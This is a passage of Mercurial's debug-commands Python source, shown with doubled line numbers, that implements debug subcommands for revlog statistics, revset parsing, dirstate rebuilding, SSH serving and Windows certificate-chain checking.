1662 1662 if spec != repo.root and not spec.startswith(rootdir):
1663 1663 return [], []
1664 1664 if os.path.isdir(spec):
1665 1665 spec += '/'
1666 1666 spec = spec[len(rootdir):]
1667 1667 fixpaths = pycompat.ossep != '/'
1668 1668 if fixpaths:
1669 1669 spec = spec.replace(pycompat.ossep, '/')
1670 1670 speclen = len(spec)
1671 1671 fullpaths = opts[r'full']
1672 1672 files, dirs = set(), set()
1673 1673 adddir, addfile = dirs.add, files.add
1674 1674 for f, st in dirstate.iteritems():
1675 1675 if f.startswith(spec) and st[0] in acceptable:
1676 1676 if fixpaths:
1677 1677 f = f.replace('/', pycompat.ossep)
1678 1678 if fullpaths:
1679 1679 addfile(f)
1680 1680 continue
1681 1681 s = f.find(pycompat.ossep, speclen)
1682 1682 if s >= 0:
1683 1683 adddir(f[:s])
1684 1684 else:
1685 1685 addfile(f)
1686 1686 return files, dirs
1687 1687
1688 1688 acceptable = ''
1689 1689 if opts[r'normal']:
1690 1690 acceptable += 'nm'
1691 1691 if opts[r'added']:
1692 1692 acceptable += 'a'
1693 1693 if opts[r'removed']:
1694 1694 acceptable += 'r'
1695 1695 cwd = repo.getcwd()
1696 1696 if not specs:
1697 1697 specs = ['.']
1698 1698
1699 1699 files, dirs = set(), set()
1700 1700 for spec in specs:
1701 1701 f, d = complete(spec, acceptable or 'nmar')
1702 1702 files.update(f)
1703 1703 dirs.update(d)
1704 1704 files.update(dirs)
1705 1705 ui.write('\n'.join(repo.pathto(p, cwd) for p in sorted(files)))
1706 1706 ui.write('\n')
1707 1707
1708 1708 @command('debugpeer', [], _('PATH'), norepo=True)
1709 1709 def debugpeer(ui, path):
1710 1710 """establish a connection to a peer repository"""
1711 1711 # Always enable peer request logging. Requires --debug to display
1712 1712 # though.
1713 1713 overrides = {
1714 1714 ('devel', 'debug.peer-request'): True,
1715 1715 }
1716 1716
1717 1717 with ui.configoverride(overrides):
1718 1718 peer = hg.peer(ui, {}, path)
1719 1719
1720 1720 local = peer.local() is not None
1721 1721 canpush = peer.canpush()
1722 1722
1723 1723 ui.write(_('url: %s\n') % peer.url())
1724 1724 ui.write(_('local: %s\n') % (_('yes') if local else _('no')))
1725 1725 ui.write(_('pushable: %s\n') % (_('yes') if canpush else _('no')))
1726 1726
1727 1727 @command('debugpickmergetool',
1728 1728 [('r', 'rev', '', _('check for files in this revision'), _('REV')),
1729 1729 ('', 'changedelete', None, _('emulate merging change and delete')),
1730 1730 ] + cmdutil.walkopts + cmdutil.mergetoolopts,
1731 1731 _('[PATTERN]...'),
1732 1732 inferrepo=True)
1733 1733 def debugpickmergetool(ui, repo, *pats, **opts):
1734 1734 """examine which merge tool is chosen for specified file
1735 1735
1736 1736 As described in :hg:`help merge-tools`, Mercurial examines
1737 1737 configurations below in this order to decide which merge tool is
1738 1738 chosen for specified file.
1739 1739
1740 1740 1. ``--tool`` option
1741 1741 2. ``HGMERGE`` environment variable
1742 1742 3. configurations in ``merge-patterns`` section
1743 1743 4. configuration of ``ui.merge``
1744 1744 5. configurations in ``merge-tools`` section
1745 1745 6. ``hgmerge`` tool (for historical reason only)
1746 1746 7. default tool for fallback (``:merge`` or ``:prompt``)
1747 1747
1748 1748 This command writes out examination result in the style below::
1749 1749
1750 1750 FILE = MERGETOOL
1751 1751
1752 1752 By default, all files known in the first parent context of the
1753 1753 working directory are examined. Use file patterns and/or -I/-X
1754 1754 options to limit target files. -r/--rev is also useful to examine
1755 1755 files in another context without actual updating to it.
1756 1756
1757 1757 With --debug, this command shows warning messages while matching
1758 1758 against ``merge-patterns`` and so on, too. It is recommended to
1759 1759 use this option with explicit file patterns and/or -I/-X options,
1760 1760 because this option increases amount of output per file according
1761 1761 to configurations in hgrc.
1762 1762
1763 1763 With -v/--verbose, this command shows configurations below at
1764 1764 first (only if specified).
1765 1765
1766 1766 - ``--tool`` option
1767 1767 - ``HGMERGE`` environment variable
1768 1768 - configuration of ``ui.merge``
1769 1769
1770 1770 If merge tool is chosen before matching against
1771 1771 ``merge-patterns``, this command can't show any helpful
1772 1772 information, even with --debug. In such case, information above is
1773 1773 useful to know why a merge tool is chosen.
1774 1774 """
1775 1775 opts = pycompat.byteskwargs(opts)
1776 1776 overrides = {}
1777 1777 if opts['tool']:
1778 1778 overrides[('ui', 'forcemerge')] = opts['tool']
1779 1779 ui.note(('with --tool %r\n') % (pycompat.bytestr(opts['tool'])))
1780 1780
1781 1781 with ui.configoverride(overrides, 'debugmergepatterns'):
1782 1782 hgmerge = encoding.environ.get("HGMERGE")
1783 1783 if hgmerge is not None:
1784 1784 ui.note(('with HGMERGE=%r\n') % (pycompat.bytestr(hgmerge)))
1785 1785 uimerge = ui.config("ui", "merge")
1786 1786 if uimerge:
1787 1787 ui.note(('with ui.merge=%r\n') % (pycompat.bytestr(uimerge)))
1788 1788
1789 1789 ctx = scmutil.revsingle(repo, opts.get('rev'))
1790 1790 m = scmutil.match(ctx, pats, opts)
1791 1791 changedelete = opts['changedelete']
1792 1792 for path in ctx.walk(m):
1793 1793 fctx = ctx[path]
1794 1794 try:
1795 1795 if not ui.debugflag:
1796 1796 ui.pushbuffer(error=True)
1797 1797 tool, toolpath = filemerge._picktool(repo, ui, path,
1798 1798 fctx.isbinary(),
1799 1799 'l' in fctx.flags(),
1800 1800 changedelete)
1801 1801 finally:
1802 1802 if not ui.debugflag:
1803 1803 ui.popbuffer()
1804 1804 ui.write(('%s = %s\n') % (path, tool))
1805 1805
1806 1806 @command('debugpushkey', [], _('REPO NAMESPACE [KEY OLD NEW]'), norepo=True)
1807 1807 def debugpushkey(ui, repopath, namespace, *keyinfo, **opts):
1808 1808 '''access the pushkey key/value protocol
1809 1809
1810 1810 With two args, list the keys in the given namespace.
1811 1811
1812 1812 With five args, set a key to new if it currently is set to old.
1813 1813 Reports success or failure.
1814 1814 '''
1815 1815
1816 1816 target = hg.peer(ui, {}, repopath)
1817 1817 if keyinfo:
1818 1818 key, old, new = keyinfo
1819 1819 r = target.pushkey(namespace, key, old, new)
1820 1820 ui.status(pycompat.bytestr(r) + '\n')
1821 1821 return not r
1822 1822 else:
1823 1823 for k, v in sorted(target.listkeys(namespace).iteritems()):
1824 1824 ui.write("%s\t%s\n" % (util.escapestr(k),
1825 1825 util.escapestr(v)))
1826 1826
1827 1827 @command('debugpvec', [], _('A B'))
1828 1828 def debugpvec(ui, repo, a, b=None):
1829 1829 ca = scmutil.revsingle(repo, a)
1830 1830 cb = scmutil.revsingle(repo, b)
1831 1831 pa = pvec.ctxpvec(ca)
1832 1832 pb = pvec.ctxpvec(cb)
1833 1833 if pa == pb:
1834 1834 rel = "="
1835 1835 elif pa > pb:
1836 1836 rel = ">"
1837 1837 elif pa < pb:
1838 1838 rel = "<"
1839 1839 elif pa | pb:
1840 1840 rel = "|"
1841 1841 ui.write(_("a: %s\n") % pa)
1842 1842 ui.write(_("b: %s\n") % pb)
1843 1843 ui.write(_("depth(a): %d depth(b): %d\n") % (pa._depth, pb._depth))
1844 1844 ui.write(_("delta: %d hdist: %d distance: %d relation: %s\n") %
1845 1845 (abs(pa._depth - pb._depth), pvec._hamming(pa._vec, pb._vec),
1846 1846 pa.distance(pb), rel))
1847 1847
1848 1848 @command('debugrebuilddirstate|debugrebuildstate',
1849 1849 [('r', 'rev', '', _('revision to rebuild to'), _('REV')),
1850 1850 ('', 'minimal', None, _('only rebuild files that are inconsistent with '
1851 1851 'the working copy parent')),
1852 1852 ],
1853 1853 _('[-r REV]'))
1854 1854 def debugrebuilddirstate(ui, repo, rev, **opts):
1855 1855 """rebuild the dirstate as it would look like for the given revision
1856 1856
1857 1857 If no revision is specified the first current parent will be used.
1858 1858
1859 1859 The dirstate will be set to the files of the given revision.
1860 1860 The actual working directory content or existing dirstate
1861 1861 information such as adds or removes is not considered.
1862 1862
1863 1863 ``minimal`` will only rebuild the dirstate status for files that claim to be
1864 1864 tracked but are not in the parent manifest, or that exist in the parent
1865 1865 manifest but are not in the dirstate. It will not change adds, removes, or
1866 1866 modified files that are in the working copy parent.
1867 1867
1868 1868 One use of this command is to make the next :hg:`status` invocation
1869 1869 check the actual file content.
1870 1870 """
1871 1871 ctx = scmutil.revsingle(repo, rev)
1872 1872 with repo.wlock():
1873 1873 dirstate = repo.dirstate
1874 1874 changedfiles = None
1875 1875 # See command doc for what minimal does.
1876 1876 if opts.get(r'minimal'):
1877 1877 manifestfiles = set(ctx.manifest().keys())
1878 1878 dirstatefiles = set(dirstate)
1879 1879 manifestonly = manifestfiles - dirstatefiles
1880 1880 dsonly = dirstatefiles - manifestfiles
1881 1881 dsnotadded = set(f for f in dsonly if dirstate[f] != 'a')
1882 1882 changedfiles = manifestonly | dsnotadded
1883 1883
1884 1884 dirstate.rebuild(ctx.node(), ctx.manifest(), changedfiles)
1885 1885
1886 1886 @command('debugrebuildfncache', [], '')
1887 1887 def debugrebuildfncache(ui, repo):
1888 1888 """rebuild the fncache file"""
1889 1889 repair.rebuildfncache(ui, repo)
1890 1890
1891 1891 @command('debugrename',
1892 1892 [('r', 'rev', '', _('revision to debug'), _('REV'))],
1893 1893 _('[-r REV] FILE'))
1894 1894 def debugrename(ui, repo, file1, *pats, **opts):
1895 1895 """dump rename information"""
1896 1896
1897 1897 opts = pycompat.byteskwargs(opts)
1898 1898 ctx = scmutil.revsingle(repo, opts.get('rev'))
1899 1899 m = scmutil.match(ctx, (file1,) + pats, opts)
1900 1900 for abs in ctx.walk(m):
1901 1901 fctx = ctx[abs]
1902 1902 o = fctx.filelog().renamed(fctx.filenode())
1903 1903 rel = m.rel(abs)
1904 1904 if o:
1905 1905 ui.write(_("%s renamed from %s:%s\n") % (rel, o[0], hex(o[1])))
1906 1906 else:
1907 1907 ui.write(_("%s not renamed\n") % rel)
1908 1908
1909 1909 @command('debugrevlog', cmdutil.debugrevlogopts +
1910 1910 [('d', 'dump', False, _('dump index data'))],
1911 1911 _('-c|-m|FILE'),
1912 1912 optionalrepo=True)
1913 1913 def debugrevlog(ui, repo, file_=None, **opts):
1914 1914 """show data and statistics about a revlog"""
1915 1915 opts = pycompat.byteskwargs(opts)
1916 1916 r = cmdutil.openrevlog(repo, 'debugrevlog', file_, opts)
1917 1917
1918 1918 if opts.get("dump"):
1919 1919 numrevs = len(r)
1920 1920 ui.write(("# rev p1rev p2rev start end deltastart base p1 p2"
1921 1921 " rawsize totalsize compression heads chainlen\n"))
1922 1922 ts = 0
1923 1923 heads = set()
1924 1924
1925 1925 for rev in xrange(numrevs):
1926 1926 dbase = r.deltaparent(rev)
1927 1927 if dbase == -1:
1928 1928 dbase = rev
1929 1929 cbase = r.chainbase(rev)
1930 1930 clen = r.chainlen(rev)
1931 1931 p1, p2 = r.parentrevs(rev)
1932 1932 rs = r.rawsize(rev)
1933 1933 ts = ts + rs
1934 1934 heads -= set(r.parentrevs(rev))
1935 1935 heads.add(rev)
1936 1936 try:
1937 1937 compression = ts / r.end(rev)
1938 1938 except ZeroDivisionError:
1939 1939 compression = 0
1940 1940 ui.write("%5d %5d %5d %5d %5d %10d %4d %4d %4d %7d %9d "
1941 1941 "%11d %5d %8d\n" %
1942 1942 (rev, p1, p2, r.start(rev), r.end(rev),
1943 1943 r.start(dbase), r.start(cbase),
1944 1944 r.start(p1), r.start(p2),
1945 1945 rs, ts, compression, len(heads), clen))
1946 1946 return 0
1947 1947
1948 1948 v = r.version
1949 1949 format = v & 0xFFFF
1950 1950 flags = []
1951 1951 gdelta = False
1952 1952 if v & revlog.FLAG_INLINE_DATA:
1953 1953 flags.append('inline')
1954 1954 if v & revlog.FLAG_GENERALDELTA:
1955 1955 gdelta = True
1956 1956 flags.append('generaldelta')
1957 1957 if not flags:
1958 1958 flags = ['(none)']
1959 1959
1960 1960 nummerges = 0
1961 1961 numfull = 0
1962 1962 numprev = 0
1963 1963 nump1 = 0
1964 1964 nump2 = 0
1965 1965 numother = 0
1966 1966 nump1prev = 0
1967 1967 nump2prev = 0
1968 1968 chainlengths = []
1969 1969 chainbases = []
1970 1970 chainspans = []
1971 1971
1972 1972 datasize = [None, 0, 0]
1973 1973 fullsize = [None, 0, 0]
1974 1974 deltasize = [None, 0, 0]
1975 1975 chunktypecounts = {}
1976 1976 chunktypesizes = {}
1977 1977
1978 1978 def addsize(size, l):
1979 1979 if l[0] is None or size < l[0]:
1980 1980 l[0] = size
1981 1981 if size > l[1]:
1982 1982 l[1] = size
1983 1983 l[2] += size
1984 1984
1985 1985 numrevs = len(r)
1986 1986 for rev in xrange(numrevs):
1987 1987 p1, p2 = r.parentrevs(rev)
1988 1988 delta = r.deltaparent(rev)
1989 1989 if format > 0:
1990 1990 addsize(r.rawsize(rev), datasize)
1991 1991 if p2 != nullrev:
1992 1992 nummerges += 1
1993 1993 size = r.length(rev)
1994 1994 if delta == nullrev:
1995 1995 chainlengths.append(0)
1996 1996 chainbases.append(r.start(rev))
1997 1997 chainspans.append(size)
1998 1998 numfull += 1
1999 1999 addsize(size, fullsize)
2000 2000 else:
2001 2001 chainlengths.append(chainlengths[delta] + 1)
2002 2002 baseaddr = chainbases[delta]
2003 2003 revaddr = r.start(rev)
2004 2004 chainbases.append(baseaddr)
2005 2005 chainspans.append((revaddr - baseaddr) + size)
2006 2006 addsize(size, deltasize)
2007 2007 if delta == rev - 1:
2008 2008 numprev += 1
2009 2009 if delta == p1:
2010 2010 nump1prev += 1
2011 2011 elif delta == p2:
2012 2012 nump2prev += 1
2013 2013 elif delta == p1:
2014 2014 nump1 += 1
2015 2015 elif delta == p2:
2016 2016 nump2 += 1
2017 2017 elif delta != nullrev:
2018 2018 numother += 1
2019 2019
2020 2020 # Obtain data on the raw chunks in the revlog.
2021 2021 segment = r._getsegmentforrevs(rev, rev)[1]
2022 2022 if segment:
2023 2023 chunktype = bytes(segment[0:1])
2024 2024 else:
2025 2025 chunktype = 'empty'
2026 2026
2027 2027 if chunktype not in chunktypecounts:
2028 2028 chunktypecounts[chunktype] = 0
2029 2029 chunktypesizes[chunktype] = 0
2030 2030
2031 2031 chunktypecounts[chunktype] += 1
2032 2032 chunktypesizes[chunktype] += size
2033 2033
2034 2034 # Adjust size min value for empty cases
2035 2035 for size in (datasize, fullsize, deltasize):
2036 2036 if size[0] is None:
2037 2037 size[0] = 0
2038 2038
2039 2039 numdeltas = numrevs - numfull
2040 2040 numoprev = numprev - nump1prev - nump2prev
2041 2041 totalrawsize = datasize[2]
2042 2042 datasize[2] /= numrevs
2043 2043 fulltotal = fullsize[2]
2044 2044 fullsize[2] /= numfull
2045 2045 deltatotal = deltasize[2]
2046 2046 if numrevs - numfull > 0:
2047 2047 deltasize[2] /= numrevs - numfull
2048 2048 totalsize = fulltotal + deltatotal
2049 2049 avgchainlen = sum(chainlengths) / numrevs
2050 2050 maxchainlen = max(chainlengths)
2051 2051 maxchainspan = max(chainspans)
2052 2052 compratio = 1
2053 2053 if totalsize:
2054 2054 compratio = totalrawsize / totalsize
2055 2055
2056 2056 basedfmtstr = '%%%dd\n'
2057 2057 basepcfmtstr = '%%%dd %s(%%5.2f%%%%)\n'
2058 2058
2059 2059 def dfmtstr(max):
2060 2060 return basedfmtstr % len(str(max))
2061 2061 def pcfmtstr(max, padding=0):
2062 2062 return basepcfmtstr % (len(str(max)), ' ' * padding)
2063 2063
2064 2064 def pcfmt(value, total):
2065 2065 if total:
2066 2066 return (value, 100 * float(value) / total)
2067 2067 else:
2068 2068 return value, 100.0
2069 2069
2070 2070 ui.write(('format : %d\n') % format)
2071 2071 ui.write(('flags : %s\n') % ', '.join(flags))
2072 2072
2073 2073 ui.write('\n')
2074 2074 fmt = pcfmtstr(totalsize)
2075 2075 fmt2 = dfmtstr(totalsize)
2076 2076 ui.write(('revisions : ') + fmt2 % numrevs)
2077 2077 ui.write((' merges : ') + fmt % pcfmt(nummerges, numrevs))
2078 2078 ui.write((' normal : ') + fmt % pcfmt(numrevs - nummerges, numrevs))
2079 2079 ui.write(('revisions : ') + fmt2 % numrevs)
2080 2080 ui.write((' full : ') + fmt % pcfmt(numfull, numrevs))
2081 2081 ui.write((' deltas : ') + fmt % pcfmt(numdeltas, numrevs))
2082 2082 ui.write(('revision size : ') + fmt2 % totalsize)
2083 2083 ui.write((' full : ') + fmt % pcfmt(fulltotal, totalsize))
2084 2084 ui.write((' deltas : ') + fmt % pcfmt(deltatotal, totalsize))
2085 2085
2086 2086 def fmtchunktype(chunktype):
2087 2087 if chunktype == 'empty':
2088 2088 return ' %s : ' % chunktype
2089 2089 elif chunktype in pycompat.bytestr(string.ascii_letters):
2090 2090 return ' 0x%s (%s) : ' % (hex(chunktype), chunktype)
2091 2091 else:
2092 2092 return ' 0x%s : ' % hex(chunktype)
2093 2093
2094 2094 ui.write('\n')
2095 2095 ui.write(('chunks : ') + fmt2 % numrevs)
2096 2096 for chunktype in sorted(chunktypecounts):
2097 2097 ui.write(fmtchunktype(chunktype))
2098 2098 ui.write(fmt % pcfmt(chunktypecounts[chunktype], numrevs))
2099 2099 ui.write(('chunks size : ') + fmt2 % totalsize)
2100 2100 for chunktype in sorted(chunktypecounts):
2101 2101 ui.write(fmtchunktype(chunktype))
2102 2102 ui.write(fmt % pcfmt(chunktypesizes[chunktype], totalsize))
2103 2103
2104 2104 ui.write('\n')
2105 2105 fmt = dfmtstr(max(avgchainlen, maxchainlen, maxchainspan, compratio))
2106 2106 ui.write(('avg chain length : ') + fmt % avgchainlen)
2107 2107 ui.write(('max chain length : ') + fmt % maxchainlen)
2108 2108 ui.write(('max chain reach : ') + fmt % maxchainspan)
2109 2109 ui.write(('compression ratio : ') + fmt % compratio)
2110 2110
2111 2111 if format > 0:
2112 2112 ui.write('\n')
2113 2113 ui.write(('uncompressed data size (min/max/avg) : %d / %d / %d\n')
2114 2114 % tuple(datasize))
2115 2115 ui.write(('full revision size (min/max/avg) : %d / %d / %d\n')
2116 2116 % tuple(fullsize))
2117 2117 ui.write(('delta size (min/max/avg) : %d / %d / %d\n')
2118 2118 % tuple(deltasize))
2119 2119
2120 2120 if numdeltas > 0:
2121 2121 ui.write('\n')
2122 2122 fmt = pcfmtstr(numdeltas)
2123 2123 fmt2 = pcfmtstr(numdeltas, 4)
2124 2124 ui.write(('deltas against prev : ') + fmt % pcfmt(numprev, numdeltas))
2125 2125 if numprev > 0:
2126 2126 ui.write((' where prev = p1 : ') + fmt2 % pcfmt(nump1prev,
2127 2127 numprev))
2128 2128 ui.write((' where prev = p2 : ') + fmt2 % pcfmt(nump2prev,
2129 2129 numprev))
2130 2130 ui.write((' other : ') + fmt2 % pcfmt(numoprev,
2131 2131 numprev))
2132 2132 if gdelta:
2133 2133 ui.write(('deltas against p1 : ')
2134 2134 + fmt % pcfmt(nump1, numdeltas))
2135 2135 ui.write(('deltas against p2 : ')
2136 2136 + fmt % pcfmt(nump2, numdeltas))
2137 2137 ui.write(('deltas against other : ') + fmt % pcfmt(numother,
2138 2138 numdeltas))
2139 2139
2140 2140 @command('debugrevspec',
2141 2141 [('', 'optimize', None,
2142 2142 _('print parsed tree after optimizing (DEPRECATED)')),
2143 2143 ('', 'show-revs', True, _('print list of result revisions (default)')),
2144 2144 ('s', 'show-set', None, _('print internal representation of result set')),
2145 2145 ('p', 'show-stage', [],
2146 2146 _('print parsed tree at the given stage'), _('NAME')),
2147 2147 ('', 'no-optimized', False, _('evaluate tree without optimization')),
2148 2148 ('', 'verify-optimized', False, _('verify optimized result')),
2149 2149 ],
2150 2150 ('REVSPEC'))
2151 2151 def debugrevspec(ui, repo, expr, **opts):
2152 2152 """parse and apply a revision specification
2153 2153
2154 2154 Use -p/--show-stage option to print the parsed tree at the given stages.
2155 2155 Use -p all to print tree at every stage.
2156 2156
2157 2157 Use --no-show-revs option with -s or -p to print only the set
2158 2158 representation or the parsed tree respectively.
2159 2159
2160 2160 Use --verify-optimized to compare the optimized result with the unoptimized
2161 2161 one. Returns 1 if the optimized result differs.
2162 2162 """
2163 2163 opts = pycompat.byteskwargs(opts)
2164 2164 aliases = ui.configitems('revsetalias')
2165 2165 stages = [
2166 2166 ('parsed', lambda tree: tree),
2167 2167 ('expanded', lambda tree: revsetlang.expandaliases(tree, aliases,
2168 2168 ui.warn)),
2169 2169 ('concatenated', revsetlang.foldconcat),
2170 2170 ('analyzed', revsetlang.analyze),
2171 2171 ('optimized', revsetlang.optimize),
2172 2172 ]
2173 2173 if opts['no_optimized']:
2174 2174 stages = stages[:-1]
2175 2175 if opts['verify_optimized'] and opts['no_optimized']:
2176 2176 raise error.Abort(_('cannot use --verify-optimized with '
2177 2177 '--no-optimized'))
2178 2178 stagenames = set(n for n, f in stages)
2179 2179
2180 2180 showalways = set()
2181 2181 showchanged = set()
2182 2182 if ui.verbose and not opts['show_stage']:
2183 2183 # show parsed tree by --verbose (deprecated)
2184 2184 showalways.add('parsed')
2185 2185 showchanged.update(['expanded', 'concatenated'])
2186 2186 if opts['optimize']:
2187 2187 showalways.add('optimized')
2188 2188 if opts['show_stage'] and opts['optimize']:
2189 2189 raise error.Abort(_('cannot use --optimize with --show-stage'))
2190 2190 if opts['show_stage'] == ['all']:
2191 2191 showalways.update(stagenames)
2192 2192 else:
2193 2193 for n in opts['show_stage']:
2194 2194 if n not in stagenames:
2195 2195 raise error.Abort(_('invalid stage name: %s') % n)
2196 2196 showalways.update(opts['show_stage'])
2197 2197
2198 2198 treebystage = {}
2199 2199 printedtree = None
2200 2200 tree = revsetlang.parse(expr, lookup=repo.__contains__)
2201 2201 for n, f in stages:
2202 2202 treebystage[n] = tree = f(tree)
2203 2203 if n in showalways or (n in showchanged and tree != printedtree):
2204 2204 if opts['show_stage'] or n != 'parsed':
2205 2205 ui.write(("* %s:\n") % n)
2206 2206 ui.write(revsetlang.prettyformat(tree), "\n")
2207 2207 printedtree = tree
2208 2208
2209 2209 if opts['verify_optimized']:
2210 2210 arevs = revset.makematcher(treebystage['analyzed'])(repo)
2211 2211 brevs = revset.makematcher(treebystage['optimized'])(repo)
2212 2212 if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
2213 2213 ui.write(("* analyzed set:\n"), smartset.prettyformat(arevs), "\n")
2214 2214 ui.write(("* optimized set:\n"), smartset.prettyformat(brevs), "\n")
2215 2215 arevs = list(arevs)
2216 2216 brevs = list(brevs)
2217 2217 if arevs == brevs:
2218 2218 return 0
2219 2219 ui.write(('--- analyzed\n'), label='diff.file_a')
2220 2220 ui.write(('+++ optimized\n'), label='diff.file_b')
2221 2221 sm = difflib.SequenceMatcher(None, arevs, brevs)
2222 2222 for tag, alo, ahi, blo, bhi in sm.get_opcodes():
2223 2223 if tag in ('delete', 'replace'):
2224 2224 for c in arevs[alo:ahi]:
2225 2225 ui.write('-%s\n' % c, label='diff.deleted')
2226 2226 if tag in ('insert', 'replace'):
2227 2227 for c in brevs[blo:bhi]:
2228 2228 ui.write('+%s\n' % c, label='diff.inserted')
2229 2229 if tag == 'equal':
2230 2230 for c in arevs[alo:ahi]:
2231 2231 ui.write(' %s\n' % c)
2232 2232 return 1
2233 2233
2234 2234 func = revset.makematcher(tree)
2235 2235 revs = func(repo)
2236 2236 if opts['show_set'] or (opts['show_set'] is None and ui.verbose):
2237 2237 ui.write(("* set:\n"), smartset.prettyformat(revs), "\n")
2238 2238 if not opts['show_revs']:
2239 2239 return
2240 2240 for c in revs:
2241 2241 ui.write("%d\n" % c)
2242 2242
2243 2243 @command('debugserve', [
2244 2244 ('', 'sshstdio', False, _('run an SSH server bound to process handles')),
2245 2245 ('', 'logiofd', '', _('file descriptor to log server I/O to')),
2246 2246 ('', 'logiofile', '', _('file to log server I/O to')),
2247 2247 ], '')
2248 2248 def debugserve(ui, repo, **opts):
2249 2249 """run a server with advanced settings
2250 2250
2251 2251 This command is similar to :hg:`serve`. It exists partially as a
2252 2252 workaround to the fact that ``hg serve --stdio`` must have specific
2253 2253 arguments for security reasons.
2254 2254 """
2255 2255 opts = pycompat.byteskwargs(opts)
2256 2256
2257 2257 if not opts['sshstdio']:
2258 2258 raise error.Abort(_('only --sshstdio is currently supported'))
2259 2259
2260 2260 logfh = None
2261 2261
2262 2262 if opts['logiofd'] and opts['logiofile']:
2263 2263 raise error.Abort(_('cannot use both --logiofd and --logiofile'))
2264 2264
2265 2265 if opts['logiofd']:
2266 2266 # Line buffered because output is line based.
2267 2267 logfh = os.fdopen(int(opts['logiofd']), r'ab', 1)
2268 2268 elif opts['logiofile']:
2269 2269 logfh = open(opts['logiofile'], 'ab', 1)
2270 2270
2271 2271 s = wireprotoserver.sshserver(ui, repo, logfh=logfh)
2272 2272 s.serve_forever()
2273 2273
2274 2274 @command('debugsetparents', [], _('REV1 [REV2]'))
2275 2275 def debugsetparents(ui, repo, rev1, rev2=None):
2276 2276 """manually set the parents of the current working directory
2277 2277
2278 2278 This is useful for writing repository conversion tools, but should
2279 2279 be used with care. For example, neither the working directory nor the
2280 2280 dirstate is updated, so file status may be incorrect after running this
2281 2281 command.
2282 2282
2283 2283 Returns 0 on success.
2284 2284 """
2285 2285
2286 2286 r1 = scmutil.revsingle(repo, rev1).node()
2287 2287 r2 = scmutil.revsingle(repo, rev2, 'null').node()
2288 2288
2289 2289 with repo.wlock():
2290 2290 repo.setparents(r1, r2)
2291 2291
2292 2292 @command('debugssl', [], '[SOURCE]', optionalrepo=True)
2293 2293 def debugssl(ui, repo, source=None, **opts):
2294 2294 '''test a secure connection to a server
2295 2295
2296 2296 This builds the certificate chain for the server on Windows, installing the
2297 2297 missing intermediates and trusted root via Windows Update if necessary. It
2298 2298 does nothing on other platforms.
2299 2299
2300 2300 If SOURCE is omitted, the 'default' path will be used. If a URL is given,
2301 2301 that server is used. See :hg:`help urls` for more information.
2302 2302
2303 2303 If the update succeeds, retry the original operation. Otherwise, the cause
2304 2304 of the SSL error is likely another issue.
2305 2305 '''
2306 2306 if not pycompat.iswindows:
2307 2307 raise error.Abort(_('certificate chain building is only possible on '
2308 2308 'Windows'))
2309 2309
2310 2310 if not source:
2311 2311 if not repo:
2312 2312 raise error.Abort(_("there is no Mercurial repository here, and no "
2313 2313 "server specified"))
2314 2314 source = "default"
2315 2315
2316 2316 source, branches = hg.parseurl(ui.expandpath(source))
2317 2317 url = util.url(source)
2318 2318 addr = None
2319 2319
2320 2320 defaultport = {'https': 443, 'ssh': 22}
2321 2321 if url.scheme in defaultport:
2322 2322 try:
2323 2323 addr = (url.host, int(url.port or defaultport[url.scheme]))
2324 2324 except ValueError:
2325 2325 raise error.Abort(_("malformed port number in URL"))
2326 2326 else:
2327 2327 raise error.Abort(_("only https and ssh connections are supported"))
2328 2328
2329 2329 from . import win32
2330 2330
2331 2331 s = ssl.wrap_socket(socket.socket(), ssl_version=ssl.PROTOCOL_TLS,
2332 2332 cert_reqs=ssl.CERT_NONE, ca_certs=None)
2333 2333
2334 2334 try:
2335 2335 s.connect(addr)
2336 2336 cert = s.getpeercert(True)
2337 2337
2338 2338 ui.status(_('checking the certificate chain for %s\n') % url.host)
2339 2339
2340 2340 complete = win32.checkcertificatechain(cert, build=False)
2341 2341
2342 2342 if not complete:
2343 2343 ui.status(_('certificate chain is incomplete, updating... '))
2344 2344
2345 2345 if not win32.checkcertificatechain(cert):
2346 2346 ui.status(_('failed.\n'))
2347 2347 else:
2348 2348 ui.status(_('done.\n'))
2349 2349 else:
2350 2350 ui.status(_('full certificate chain is available\n'))
2351 2351 finally:
2352 2352 s.close()
2353 2353
2354 2354 @command('debugsub',
2355 2355 [('r', 'rev', '',
2356 2356 _('revision to check'), _('REV'))],
2357 2357 _('[-r REV] [REV]'))
2358 2358 def debugsub(ui, repo, rev=None):
2359 2359 ctx = scmutil.revsingle(repo, rev, None)
2360 2360 for k, v in sorted(ctx.substate.items()):
2361 2361 ui.write(('path %s\n') % k)
2362 2362 ui.write((' source %s\n') % v[0])
2363 2363 ui.write((' revision %s\n') % v[1])
2364 2364
2365 2365 @command('debugsuccessorssets',
2366 2366 [('', 'closest', False, _('return closest successors sets only'))],
2367 2367 _('[REV]'))
2368 2368 def debugsuccessorssets(ui, repo, *revs, **opts):
2369 2369 """show set of successors for revision
2370 2370
2371 2371 A successors set of changeset A is a consistent group of revisions that
2372 2372 succeed A. It contains non-obsolete changesets only unless closests
2373 2373 successors set is set.
2374 2374
2375 2375 In most cases a changeset A has a single successors set containing a single
2376 2376 successor (changeset A replaced by A').
2377 2377
2378 2378 A changeset that is made obsolete with no successors are called "pruned".
2379 2379 Such changesets have no successors sets at all.
2380 2380
2381 2381 A changeset that has been "split" will have a successors set containing
2382 2382 more than one successor.
2383 2383
2384 2384 A changeset that has been rewritten in multiple different ways is called
2385 2385 "divergent". Such changesets have multiple successor sets (each of which
2386 2386 may also be split, i.e. have multiple successors).
2387 2387
2388 2388 Results are displayed as follows::
2389 2389
2390 2390 <rev1>
2391 2391 <successors-1A>
2392 2392 <rev2>
2393 2393 <successors-2A>
2394 2394 <successors-2B1> <successors-2B2> <successors-2B3>
2395 2395
2396 2396 Here rev2 has two possible (i.e. divergent) successors sets. The first
2397 2397 holds one element, whereas the second holds three (i.e. the changeset has
2398 2398 been split).
2399 2399 """
2400 2400 # passed to successorssets caching computation from one call to another
2401 2401 cache = {}
2402 2402 ctx2str = bytes
2403 2403 node2str = short
2404 2404 for rev in scmutil.revrange(repo, revs):
2405 2405 ctx = repo[rev]
2406 2406 ui.write('%s\n'% ctx2str(ctx))
2407 2407 for succsset in obsutil.successorssets(repo, ctx.node(),
2408 2408 closest=opts[r'closest'],
2409 2409 cache=cache):
2410 2410 if succsset:
2411 2411 ui.write(' ')
2412 2412 ui.write(node2str(succsset[0]))
2413 2413 for node in succsset[1:]:
2414 2414 ui.write(' ')
2415 2415 ui.write(node2str(node))
2416 2416 ui.write('\n')
2417 2417
2418 2418 @command('debugtemplate',
